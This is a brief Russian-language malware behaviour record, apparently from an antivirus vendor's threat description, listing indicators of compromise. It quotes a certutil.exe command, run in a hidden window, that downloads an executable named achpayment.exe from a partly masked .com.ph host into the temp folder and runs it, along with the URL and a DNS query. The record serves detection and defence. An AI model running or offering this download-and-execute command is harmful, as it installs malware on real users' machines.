Техническая информация
- '<SYSTEM32>\certutil.exe' -urlcache -split -f http://ar###.com.ph/ALABA/NOTDELETE/COME/GOOD/achpayment.exe %TEMP%\filename.exe
- %TEMP%\filename.exe
- http://ar###.com.ph/ALABA/NOTDELETE/COME/GOOD/achpayment.exe
- DNS ASK ar###.com.ph
- '<SYSTEM32>\certutil.exe' -urlcache -split -f http://ar###.com.ph/ALABA/NOTDELETE/COME/GOOD/achpayment.exe %TEMP%\filename.exe' (со скрытым окном)